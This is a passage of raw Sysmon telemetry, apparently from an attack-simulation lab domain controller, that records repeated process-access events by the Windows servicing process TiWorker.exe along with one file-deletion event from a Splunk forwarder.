\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.480{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.480{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.465{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.465{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.465{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005985Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.449{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000005984Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.449{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF02AF33DDCE03768D69380C93EDC01,SHA256=AE8F57FA44253482E18AEBB0ED52396B2AC13A0ECEACE2D5C531EC9D77CC14EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005983Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.434{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005982Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.418{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005981Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.402{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005980Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.402{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005979Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005978Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005977Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.371{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000005976Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
